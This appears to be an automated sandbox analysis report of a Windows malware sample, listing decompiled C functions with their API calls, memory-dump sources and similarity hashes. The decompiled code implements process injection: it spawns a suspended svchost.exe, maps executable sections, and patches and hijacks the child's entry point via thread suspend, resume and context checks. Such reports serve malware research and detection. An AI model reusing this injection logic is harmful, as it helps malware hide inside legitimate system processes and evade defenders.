                                          C-Code - Quality: 57%
                                          			E00AB2591(intOrPtr _a4, void** _a8, intOrPtr* _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				void* _v20;
                                          				int _v24;
                                          				int _v28;
                                          				long _v32;
                                          				int _v36;
                                          				int _v40;
                                          				void* _v44;
                                          				long _t27;
                                          				long _t31;
                                          				void* _t33;
                                          				long _t36;
                                          				intOrPtr* _t42;
                                          				long _t43;
                                          
                                          				asm("stosd");
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				asm("stosd");
                                          				_v16 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t27 = 0x40;
                                          				_v32 = _t27;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				_t31 = NtCreateSection( &_v8, 0xf001f,  &_v44,  &_v20, _t27, 0x8000000, 0); // executed
                                          				_t42 = _a12;
                                          				if(_t31 < 0) {
                                          					_t43 = RtlNtStatusToDosError(_t31);
                                          					goto L5;
                                          				} else {
                                          					_t36 = E00AB27C1(_v8, 0xffffffff,  &_v12); // executed
                                          					_t43 = _t36;
                                          					if(_t43 != 0) {
                                          						L5:
                                          						_t33 = _v8;
                                          					} else {
                                          						memset(_v12, 0, _v20);
                                          						 *_a8 = _v12;
                                          						if(_t42 == 0) {
                                          							goto L5;
                                          						} else {
                                          							_t33 = _v8;
                                          							 *_t42 = _t33;
                                          						}
                                          					}
                                          				}
                                          				if(_t33 != 0 && _t42 == 0) {
                                          					__imp__ZwClose(_t33);
                                          				}
                                          				return _t43;
                                          			}

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,00AB19B8,00000040,08000000,00000000), ref: 00AB25E6
                                          • memset.NTDLL ref: 00AB2611
                                          • RtlNtStatusToDosError.NTDLL ref: 00AB262D
                                          • ZwClose.NTDLL(?), ref: 00AB2641
                                            • Part of subcall function 00AB27C1: NtMapViewOfSection.NTDLL(000000FF,?,00000040,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 00AB27EA
                                            • Part of subcall function 00AB27C1: RtlNtStatusToDosError.NTDLL ref: 00AB27F1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorSectionStatus$CloseCreateViewmemset
                                          • String ID:
                                          • API String ID: 783833395-0
                                          • Opcode ID: 95dfd2509bdb48e0d0758a400aafecf67b4d63537f85ce88a09953ab80d8ce2e
                                          • Instruction ID: 26882d515521e23b3a52356096e64029069aedf9a52d2dd538819fc541b1a465
                                          • Opcode Fuzzy Hash: 95dfd2509bdb48e0d0758a400aafecf67b4d63537f85ce88a09953ab80d8ce2e
                                          • Instruction Fuzzy Hash: 2F21FA75D00619AFDB11DFA9C980AEEBBBCFF08350F20016AE914E7251E7359E048B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00AB27C1(void* _a4, void* _a8, PVOID* _a12) {
                                          				long _v8;
                                          				long _v12;
                                          				void* _v16;
                                          				long _t11;
                                          
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_t11 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
                                          				return RtlNtStatusToDosError(_t11);
                                          			}

                                          APIs
                                          • NtMapViewOfSection.NTDLL(000000FF,?,00000040,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 00AB27EA
                                          • RtlNtStatusToDosError.NTDLL ref: 00AB27F1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorSectionStatusView
                                          • String ID:
                                          • API String ID: 1313840181-0
                                          • Opcode ID: 0e1f3dd4c4eef65bc1b41761cc5fc3fe5cd9c49c527e4c906081bda3aa5e657a
                                          • Instruction ID: 968dcefa4a3faa21ab5c33efafc35a0c729b172cafb39e0a324fe61b2592d88f
                                          • Opcode Fuzzy Hash: 0e1f3dd4c4eef65bc1b41761cc5fc3fe5cd9c49c527e4c906081bda3aa5e657a
                                          • Instruction Fuzzy Hash: E8E07DB5D0020CBFEF05AF90DD0BEAEBB7CEB04300F10826ABD1556251E6B16A159B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00AB27FB(void* _a4, void* _a8) {
                                          				long _t3;
                                          
                                          				_t3 = NtUnmapViewOfSection(_a4, _a8); // executed
                                          				return RtlNtStatusToDosError(_t3);
                                          			}

                                          APIs
                                          • NtUnmapViewOfSection.NTDLL(00AB1CCD,?), ref: 00AB2804
                                          • RtlNtStatusToDosError.NTDLL ref: 00AB280B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorSectionStatusUnmapView
                                          • String ID:
                                          • API String ID: 507025375-0
                                          • Opcode ID: 3426fba7cba053acf5cd2d063d614908a764619ae81d11ec12bc986b981975b9
                                          • Instruction ID: a3e782b449066a3e46577fb4d752d5b8a9666a487232ce0353102fcee829c0c0
                                          • Opcode Fuzzy Hash: 3426fba7cba053acf5cd2d063d614908a764619ae81d11ec12bc986b981975b9
                                          • Instruction Fuzzy Hash: A2C04832800608FFCF017FE1EC089893F2DEB08361B108110FA0989072CB7295229FA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00AB14B0(void* __ecx, long __edx) {
                                          				void _v1040;
                                          				short _v1060;
                                          				short _v1068;
                                          				void _v1560;
                                          				short _v1580;
                                          				struct _STARTUPINFOW _v1656;
                                          				struct _PROCESS_INFORMATION _v1672;
                                          				void* _t24;
                                          				void* _t27;
                                          				int _t34;
                                          				int _t45;
                                          				void* _t53;
                                          				long _t54;
                                          				int _t55;
                                          				void** _t57;
                                          				void** _t58;
                                          				void** _t59;
                                          
                                          				_t54 = __edx;
                                          				_t53 = __ecx;
                                          				_t55 = 0;
                                          				_t24 = E00AB2813(_t53, GetModuleHandleA(0), 3); // executed
                                          				_t57 =  &(( &(_v1672.hThread))[2]);
                                          				if(_t24 == 0) {
                                          					asm("xorps xmm0, xmm0");
                                          					asm("cdq");
                                          					asm("movups [esp+0xc], xmm0");
                                          					_v1672.hThread = 0xab6000;
                                          					_v1672.dwProcessId = _t54;
                                          					_v1656.lpReserved = 0x2b000;
                                          					if(( *0xb16d44 & 0x00000001) != 0) {
                                          						_v1656.lpDesktop = 0x35800;
                                          						asm("cdq");
                                          						_v1672.dwThreadId = 0xae1000;
                                          						_v1656.cb = _t54;
                                          					}
                                          					_t27 = E00AB1A48(_t53,  &(_v1672.hThread), 0);
                                          					_t58 =  &(_t57[2]);
                                          					if(_t27 == 0) {
                                          						E00AB32D6(_t27);
                                          						memset( &_v1560, 0, 0x208);
                                          						memset( &_v1040, 0, 0x410);
                                          						_t59 =  &(_t58[7]);
                                          						_t34 =  &_v1560;
                                          						__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t34); // executed
                                          						if(_t34 == 0) {
                                          							asm("xorps xmm0, xmm0");
                                          							asm("movups [esp+0x28], xmm0");
                                          							memset( &(_v1656.lpTitle), _t34, 0x40);
                                          							_t59 =  &(_t59[3]);
                                          							_v1656.lpDesktop = 0x44;
                                          							PathCombineW( &_v1060,  &_v1580, L"svchost.exe -k");
                                          							_t45 = CreateProcessW(0,  &_v1068, 0, 0, 0, 0x4000004, 0, 0,  &_v1656,  &_v1672); // executed
                                          							_t55 = _t45;
                                          							if(_t55 != 0) {
                                          								E00AB18AD(_t53, _t54,  &_v1672, 4, 1); // executed
                                          								_t59 =  &(_t59[3]);
                                          								asm("sbb edi, edi");
                                          								_t55 = _t55 + 1;
                                          								CloseHandle(_v1672.hThread);
                                          								CloseHandle(_v1672);
                                          							}
                                          						}
                                          						E00AB18AC(E00AB32D6(1));
                                          					}
                                          					return _t55;
                                          				} else {
                                          					return 0;
                                          				}
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000003), ref: 00AB14BC
                                            • Part of subcall function 00AB2813: GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB2826
                                            • Part of subcall function 00AB2813: GetVersion.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2839
                                            • Part of subcall function 00AB2813: GetCurrentProcessId.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2849
                                            • Part of subcall function 00AB2813: StrRChrA.SHLWAPI(00000000,0000005C,?,?,?,00AB14C8,00000000), ref: 00AB28B5
                                            • Part of subcall function 00AB2813: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB28CB
                                            • Part of subcall function 00AB2813: GetLastError.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB28DA
                                          • memset.NTDLL ref: 00AB153F
                                          • memset.NTDLL ref: 00AB1553
                                          • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00AB1568
                                          • memset.NTDLL ref: 00AB1586
                                          • PathCombineW.SHLWAPI(?,?,svchost.exe -k), ref: 00AB15A8
                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000004,00000000,00000000,?,?), ref: 00AB15D1
                                          • CloseHandle.KERNEL32(?), ref: 00AB15F7
                                          • CloseHandle.KERNEL32(?), ref: 00AB1601
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$memset$CloseCreateModulePathProcess$CombineCurrentErrorEventFolderLastVersion
                                          • String ID: 6$u$D$svchost.exe -k
                                          • API String ID: 2129906036-3607948105
                                          • Opcode ID: fc9c4a30c62d5a77db9a46cbd53afd801b4ef2a485024108ae85022696847823
                                          • Instruction ID: 82b497e8f8b004ac073703baed38f93c11a5b4925226df874277bbb0329934aa
                                          • Opcode Fuzzy Hash: fc9c4a30c62d5a77db9a46cbd53afd801b4ef2a485024108ae85022696847823
                                          • Instruction Fuzzy Hash: 143107B1A443407BE720EBA0DC0AFDB77DCAFC8700F544A29B644D60D2EB74D1488756
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00AB18AD(void* __ecx, void* __edx, intOrPtr* _a4, signed char _a8, intOrPtr _a12) {
                                          				void* _v8;
                                          				void* _v12;
                                          				long _v16;
                                          				char _v20;
                                          				intOrPtr _v24;
                                          				void _v28;
                                          				struct _CONTEXT _v744;
                                          				void* __ebx;
                                          				intOrPtr _t42;
                                          				void* _t43;
                                          				void* _t44;
                                          				void* _t51;
                                          				long _t58;
                                          				long _t63;
                                          				void* _t65;
                                          				void* _t66;
                                          				void* _t73;
                                          				long _t75;
                                          				intOrPtr* _t76;
                                          				void* _t77;
                                          				void* _t78;
                                          				void* _t79;
                                          
                                          				_t73 = __edx;
                                          				_t66 = __ecx;
                                          				memset( &_v744, 0, 0x2cc);
                                          				_t76 = _a4;
                                          				_t65 = 0;
                                          				_v20 = 0xccccfeeb;
                                          				_v12 =  *_t76;
                                          				_t42 =  *0xb16d54; // 0x0
                                          				_v24 = _t42;
                                          				_t43 = E00AB3003(_t66,  *((intOrPtr*)(_t76 + 8)), 0);
                                          				_t78 = _t77 + 0x14;
                                          				if(_t43 == 0) {
                                          					if(( *0xb16d44 & 0x00000001) == 0) {
                                          						goto L2;
                                          					} else {
                                          						if(_a12 != 0) {
                                          							L14:
                                          							_push(_a12);
                                          							_push(_t65);
                                          							_push(_t76); // executed
                                          							_t63 = E00AB220D(_t73); // executed
                                          							_t75 = _t63;
                                          							goto L17;
                                          						} else {
                                          							_t65 = E00AB3127( *0xb16d54);
                                          							if(_t65 == 0) {
                                          								goto L18;
                                          							} else {
                                          								goto L14;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_push(0x10);
                                          					_pop(0);
                                          					L2:
                                          					_push(0);
                                          					_v744.ContextFlags = 0x10003;
                                          					_t44 = E00AB1CE6( *_t76);
                                          					_v8 = _t44;
                                          					_t70 =  &_v28;
                                          					if(ReadProcessMemory(_v12, _t44,  &_v28, 4,  &_v16) == 0 || _v16 != 4) {
                                          						L18:
                                          						_t75 = GetLastError();
                                          					} else {
                                          						_t51 = E00AB1F33( &_v28, _v12, _v8,  &_v20, 4);
                                          						_t79 = _t78 + 0x10;
                                          						if(_t51 != 0) {
                                          							_a4 = 0x1770;
                                          							while(1) {
                                          								ResumeThread( *(_t76 + 4));
                                          								Sleep(0x12c);
                                          								SuspendThread( *(_t76 + 4));
                                          								_a4 = _a4 - 0x12c;
                                          								if(GetThreadContext( *(_t76 + 4),  &_v744) == 0) {
                                          									goto L18;
                                          								}
                                          								if(_a4 <= 0 || _v744.Eip == _v8) {
                                          									_push(0);
                                          									if(_a12 == _t65) {
                                          										_push(_v24);
                                          										_push(_t76);
                                          										_t58 = E00AB2E6D(_t70, _t73);
                                          										_t79 = _t79 + 0xc;
                                          									} else {
                                          										_t58 = E00AB1B12(_t65, _t73);
                                          										_t70 = _t76;
                                          									}
                                          									_t75 = _t58;
                                          									SwitchToThread();
                                          									E00AB1F33(_t70, _v12, _v8,  &_v28, 4);
                                          									L17:
                                          									if(_t75 == 0xffffffff) {
                                          										goto L18;
                                          									}
                                          								} else {
                                          									continue;
                                          								}
                                          								goto L19;
                                          							}
                                          						}
                                          						goto L18;
                                          					}
                                          				}
                                          				L19:
                                          				if((_a8 & 0x00000004) == 0) {
                                          					ResumeThread( *(_t76 + 4));
                                          				}
                                          				if(_t65 != 0) {
                                          					LocalFree(_t65);
                                          				}
                                          				return _t75;
                                          			}

























                                          0x00ab18ad
                                          0x00ab18ad
                                          0x00ab18c8
                                          0x00ab18cd
                                          0x00ab18d0
                                          0x00ab18d3
                                          0x00ab18df
                                          0x00ab18e2
                                          0x00ab18e7
                                          0x00ab18ea
                                          0x00ab18ef
                                          0x00ab18f4
                                          0x00ab19c3
                                          0x00000000
                                          0x00ab19c9
                                          0x00ab19cc
                                          0x00ab19e0
                                          0x00ab19e0
                                          0x00ab19e3
                                          0x00ab19e4
                                          0x00ab19e5
                                          0x00ab19ed
                                          0x00000000
                                          0x00ab19ce
                                          0x00ab19d9
                                          0x00ab19de
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab19de
                                          0x00ab19cc
                                          0x00ab18fa
                                          0x00ab18fa
                                          0x00ab18fc
                                          0x00ab18fd
                                          0x00ab18fd
                                          0x00ab1900
                                          0x00ab190a
                                          0x00ab1914
                                          0x00ab191a
                                          0x00ab192a
                                          0x00ab1a1e
                                          0x00ab1a24
                                          0x00ab193a
                                          0x00ab1946
                                          0x00ab194b
                                          0x00ab1950
                                          0x00ab195b
                                          0x00ab195e
                                          0x00ab1961
                                          0x00ab196c
                                          0x00ab1975
                                          0x00ab197b
                                          0x00ab1994
                                          0x00000000
                                          0x00000000
                                          0x00ab199f
                                          0x00ab19ac
                                          0x00ab19b0
                                          0x00ab19f1
                                          0x00ab19f4
                                          0x00ab19f5
                                          0x00ab19fa
                                          0x00ab19b2
                                          0x00ab19b3
                                          0x00ab19b9
                                          0x00ab19b9
                                          0x00ab19fd
                                          0x00ab19ff
                                          0x00ab1a11
                                          0x00ab1a19
                                          0x00ab1a1c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab199f
                                          0x00ab195e
                                          0x00000000
                                          0x00ab1950
                                          0x00ab192a
                                          0x00ab1a26
                                          0x00ab1a2a
                                          0x00ab1a2f
                                          0x00ab1a2f
                                          0x00ab1a37
                                          0x00ab1a3a
                                          0x00ab1a3a
                                          0x00ab1a47

                                          APIs
                                          • memset.NTDLL ref: 00AB18C8
                                            • Part of subcall function 00AB3003: GetModuleHandleW.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB301E
                                            • Part of subcall function 00AB3003: GetProcAddress.KERNEL32(00000000), ref: 00AB3025
                                            • Part of subcall function 00AB3003: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB3045
                                            • Part of subcall function 00AB3003: FindCloseChangeNotification.KERNELBASE(00AB14C8,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB306E
                                          • ReadProcessMemory.KERNEL32(?,00000000,?,00000004,?,?,?,00000000), ref: 00AB1922
                                            • Part of subcall function 00AB1F33: VirtualProtectEx.KERNEL32(CCCCFEEB,?,00AB194B,00000004,00000004,00000000,?,?,?,?,00AB194B,?,?,CCCCFEEB,00000004), ref: 00AB1F4C
                                            • Part of subcall function 00AB1F33: WriteProcessMemory.KERNEL32(CCCCFEEB,?,?,00AB194B,CCCCFEEB,?,?,?,00AB194B,?,?,CCCCFEEB,00000004,?,?,00000000), ref: 00AB1F64
                                            • Part of subcall function 00AB1F33: VirtualProtectEx.KERNEL32(CCCCFEEB,?,00AB194B,00000004,00000004,?,?,?,00AB194B,?,?,CCCCFEEB,00000004,?,?,00000000), ref: 00AB1F85
                                          • ResumeThread.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00AB1961
                                          • Sleep.KERNEL32(0000012C,?,?,?,?,?,?,00000000), ref: 00AB196C
                                          • SuspendThread.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00AB1975
                                          • GetThreadContext.KERNEL32(?,00010003,?,?,?,?,?,?,00000000), ref: 00AB198C
                                          • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00AB19FF
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00AB1A1E
                                          • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00AB1A2F
                                          • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00AB1A3A
                                            • Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F), ref: 00AB1D26
                                            • Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,?,00000000,00001000,00000000,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1D46
                                            • Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,00008664,?,00000018,00000000), ref: 00AB1D93
                                            • Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000), ref: 00AB1DB1
                                            • Part of subcall function 00AB1CE6: LocalFree.KERNEL32(00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1DC2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Memory$ReadThread$FreeLocalProtectResumeVirtual$AddressChangeCloseContextErrorFindHandleLastModuleNotificationOpenProcSleepSuspendSwitchWritememset
                                          • String ID:
                                          • API String ID: 1819368984-0
                                          • Opcode ID: 06e2f1ec336c8070d210e8c17519d87ca0fcc9e633c6c2044f80472e1ebec275
                                          • Instruction ID: c35e04d6f0813e8662f3936690e293beb2c65d6699a0aea89a49a691b5d5e6b1
                                          • Opcode Fuzzy Hash: 06e2f1ec336c8070d210e8c17519d87ca0fcc9e633c6c2044f80472e1ebec275
                                          • Instruction Fuzzy Hash: 6B41DF72A00249AFDF21EFA0ED55AEE7BBCFF05350F440069FA0492162EB319A50DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E00AB2C02(void* __ecx, void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                          				signed int _v8;
                                          				char* _v12;
                                          				void* _t30;
                                          				void* _t34;
                                          				CHAR* _t37;
                                          				int _t41;
                                          				char* _t42;
                                          				long _t50;
                                          				intOrPtr* _t52;
                                          				intOrPtr* _t53;
                                          				signed int _t55;
                                          				long _t57;
                                          				void* _t59;
                                          				void* _t61;
                                          				void* _t63;
                                          				void* _t64;
                                          
                                          				_push(2);
                                          				E00AB3509(_a4, 0, 0,  &_v8); // executed
                                          				_t57 = _v8;
                                          				_t64 = _t63 + 0x10;
                                          				_v12 = _t57;
                                          				_t30 = VirtualAlloc(0, _t57, 0x3000, 4); // executed
                                          				_t61 = _t30;
                                          				if(_t61 == 0) {
                                          					L16:
                                          					_push(8);
                                          					_pop(0);
                                          					L17:
                                          					if(_t61 != 0) {
                                          						VirtualFree(_t61, 0, 0x8000); // executed
                                          					}
                                          					return 0;
                                          				}
                                          				_t50 = _t57;
                                          				while(1) {
                                          					_t34 = E00AB3509(_a4, _t61, _t57,  &_v8); // executed
                                          					_t57 = _v8;
                                          					_t64 = _t64 + 0x10;
                                          					if(_t34 != 0 || _t50 >= _t57) {
                                          						break;
                                          					}
                                          					_t50 = _t57;
                                          					_v12 = _t50;
                                          					VirtualFree(_t61, 0, 0x8000);
                                          					_t61 = VirtualAlloc(0, _t57, 0x3000, 4);
                                          					if(_t61 != 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_push(2);
                                          				_pop(0);
                                          				if(_t61 == 0 || _v12 < _t57) {
                                          					goto L16;
                                          				} else {
                                          					_v8 = _v8 & 0x00000000;
                                          					_t12 = _t61 + 8; // 0x8
                                          					_t59 = _t12;
                                          					if( *_t61 <= 0) {
                                          						goto L17;
                                          					} else {
                                          						goto L8;
                                          					}
                                          					while(1) {
                                          						L8:
                                          						_t37 = ( *(_t59 + 0x1e) & 0x0000ffff) + 0x20 + _t59;
                                          						_v12 = _t37;
                                          						if(_a8 == 0) {
                                          							break;
                                          						}
                                          						_t41 = lstrcmpiA(_t37, _a8); // executed
                                          						if(_t41 == 0) {
                                          							break;
                                          						}
                                          						_t42 = StrChrA(_v12, 0x2e);
                                          						if(_t42 == 0) {
                                          							L12:
                                          							_t59 = _t59 + 0x120;
                                          							_t55 = _v8 + 1;
                                          							_v8 = _t55;
                                          							if(_t55 <  *_t61) {
                                          								continue;
                                          							}
                                          							goto L17;
                                          						}
                                          						 *_t42 = 0;
                                          						if(lstrcmpiA(_v12, _a8) == 0) {
                                          							break;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t52 = _a12;
                                          					 *_t52 =  *((intOrPtr*)(_t59 + 8));
                                          					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t59 + 0xc));
                                          					_t53 = _a16;
                                          					if(_t53 != 0) {
                                          						 *_t53 =  *((intOrPtr*)(_t59 + 0x10));
                                          					}
                                          					goto L17;
                                          				}
                                          			}



















                                          0x00ab2c0a
                                          0x00ab2c18
                                          0x00ab2c1d
                                          0x00ab2c20
                                          0x00ab2c23
                                          0x00ab2c30
                                          0x00ab2c36
                                          0x00ab2c3a
                                          0x00ab2d16
                                          0x00ab2d16
                                          0x00ab2d18
                                          0x00ab2d19
                                          0x00ab2d1b
                                          0x00ab2d25
                                          0x00ab2d25
                                          0x00ab2d33
                                          0x00ab2d33
                                          0x00ab2c40
                                          0x00ab2c42
                                          0x00ab2c4b
                                          0x00ab2c50
                                          0x00ab2c53
                                          0x00ab2c58
                                          0x00000000
                                          0x00000000
                                          0x00ab2c65
                                          0x00ab2c68
                                          0x00ab2c6b
                                          0x00ab2c81
                                          0x00ab2c85
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab2c85
                                          0x00ab2c87
                                          0x00ab2c89
                                          0x00ab2c8c
                                          0x00000000
                                          0x00ab2c97
                                          0x00ab2c97
                                          0x00ab2c9b
                                          0x00ab2c9b
                                          0x00ab2ca1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab2ca3
                                          0x00ab2ca3
                                          0x00ab2caa
                                          0x00ab2cb0
                                          0x00ab2cb3
                                          0x00000000
                                          0x00000000
                                          0x00ab2cb9
                                          0x00ab2cc1
                                          0x00000000
                                          0x00000000
                                          0x00ab2cc8
                                          0x00ab2cd0
                                          0x00ab2ce5
                                          0x00ab2ce8
                                          0x00ab2cee
                                          0x00ab2cef
                                          0x00ab2cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab2cf6
                                          0x00ab2cd5
                                          0x00ab2ce3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab2ce3
                                          0x00ab2cf8
                                          0x00ab2d00
                                          0x00ab2d05
                                          0x00ab2d08
                                          0x00ab2d0d
                                          0x00ab2d12
                                          0x00ab2d12
                                          0x00000000
                                          0x00ab2d0d

                                          APIs
                                            • Part of subcall function 00AB3509: GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000002,00000000,NTDLL.DLL,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB351D
                                            • Part of subcall function 00AB3509: GetProcAddress.KERNEL32(00000000,ZwWow64QueryInformationProcess64), ref: 00AB3529
                                            • Part of subcall function 00AB3509: NtWow64QueryInformationProcess64.NTDLL(00000008,00000000,00000030,00000030,00000008,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3545
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2C30
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AB2D25
                                            • Part of subcall function 00AB3509: StrRChrA.KERNELBASE(00000020,00000000,0000005C), ref: 00AB36D7
                                            • Part of subcall function 00AB3509: LocalFree.KERNEL32(?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D,00000000), ref: 00AB3728
                                            • Part of subcall function 00AB3509: LocalFree.KERNEL32(00000000,?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3732
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00AB2C6B
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AB2C7B
                                          • lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CB9
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 00AB2CC8
                                          • lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual$AllocLocallstrcmpi$AddressHandleInformationModuleProcProcess64QueryWow64
                                          • String ID: NTDLL.DLL
                                          • API String ID: 2432548908-1613819793
